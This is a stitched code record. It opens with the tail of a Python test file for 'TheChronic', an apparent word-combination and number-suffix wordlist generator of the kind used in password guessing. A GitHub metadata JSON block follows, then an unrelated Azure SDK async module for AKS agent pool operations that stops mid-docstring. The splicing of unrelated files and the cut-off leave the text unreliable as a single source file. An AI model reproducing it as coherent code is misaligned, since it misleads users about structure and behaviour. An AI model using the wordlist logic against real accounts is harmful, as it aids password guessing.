thechronic = TheChronic(words=self.words1)
expected_result = [
'cat', 'dog', 'rat',
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 12)
self.assertCountEqual(res, expected_result)
res = list(thechronic.combine(num_words=5, build_up=True))
self.assertEqual(len(res), 363)
def test_combinations_load_from_single_file(self):
thechronic = TheChronic(files=self.WORDS1_PATH)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1, repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 27)
self.assertCountEqual(res, expected_result)
def test_combinations_load_from_multiple_file(self):
thechronic = TheChronic(files=(self.WORDS1_PATH, self.WORDS2_PATH))
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
def test_combinaitons_load_from_words_and_file(self):
thechronic = TheChronic(words=self.words1, files=self.WORDS2_PATH)
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
def test_min_length(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2, build_up=True, min_length=4))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
def test_max_length(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'cat', 'dog', 'rat',
]
res = list(thechronic.combine(num_words=2, build_up=True, max_length=3))
self.assertEqual(len(res), 3)
self.assertCountEqual(res, expected_result)
res = list(thechronic.combine(num_words=2, build_up=True, max_length=2))
self.assertEqual(len(res), 0)
self.assertCountEqual(res, [])
def test_min_max_length(self):
thechronic = TheChronic(words=['the', 'game', 'the documentary',
'the doctor\'s advocate', 'l.a.x.', 'red', '1992'])
expected_result = ['the', 'game', 'red', '1992']
res = list(thechronic.combine(num_words=1, build_up=True,
min_length=2, max_length=4))
self.assertEqual(len(res), 4)
self.assertCountEqual(res, expected_result)
def test_ending_numbers(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat201', 'catdog102', 'catrat001',
'dogcat101', 'dogdog102', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=False)
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 12012)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_with_build_up(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'cat1', 'dog23', 'cat17', 'rat12',
'catcat1', 'catdog00', 'catrat021',
'dogcat22', 'dogdog99', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 13332)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_no_combine_build_up(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat1', 'catdog00', 'catrat021',
'dogcat22', 'dogdog99', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=False))
self.assertEqual(len(res), 9999)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_empty_wordlist(self):
thechronic = TheChronic()
expected_result = ['201', '19', '0', '022', '000',]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=False))
self.assertEqual(len(res), 1110)
self._assert_iterable_contains(expected_result, res)
| {
"content_hash": "2cee2da0d732df4eb3dcb8e9cdcfb26c",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 80,
"avg_line_length": 37.05725190839695,
"alnum_prop": 0.6053146565042744,
"repo_name": "iluxonchik/the-chronic",
"id": "decd08f8737ef60581c1f25d6826a461ef1542d1",
"size": "9709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_combinations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "18415"
}
],
"symlink_target": ""
} |
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import (
build_create_or_update_request,
build_delete_request,
build_get_available_agent_pool_versions_request,
build_get_request,
build_get_upgrade_profile_request,
build_list_request,
build_upgrade_node_image_version_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2021_05_01.aio.ContainerServiceClient`'s
:attr:`agent_pools` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, resource_group_name: str, resource_name: str, **kwargs: Any) -> AsyncIterable["_models.AgentPool"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPool or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools"} # type: ignore
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPool:
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> _models.AgentPool:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "AgentPool")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("AgentPool", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: _models.AgentPool,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Is either a model type or a IO type.
Required.
:type parameters: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPoolUpgradeProfile:
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPoolUpgradeProfile
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolUpgradeProfile]
request = build_get_upgrade_profile_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_upgrade_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolUpgradeProfile", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default"} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> _models.AgentPoolAvailableVersions:
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPoolAvailableVersions
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolAvailableVersions]
request = build_get_available_agent_pool_versions_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_available_agent_pool_versions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolAvailableVersions", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions"} # type: ignore
async def _upgrade_node_image_version_initial(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> Optional[_models.AgentPool]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[_models.AgentPool]]
request = build_upgrade_node_image_version_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._upgrade_node_image_version_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 202:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_upgrade_node_image_version_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"} # type: ignore
@distributed_trace_async
async def begin_upgrade_node_image_version(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
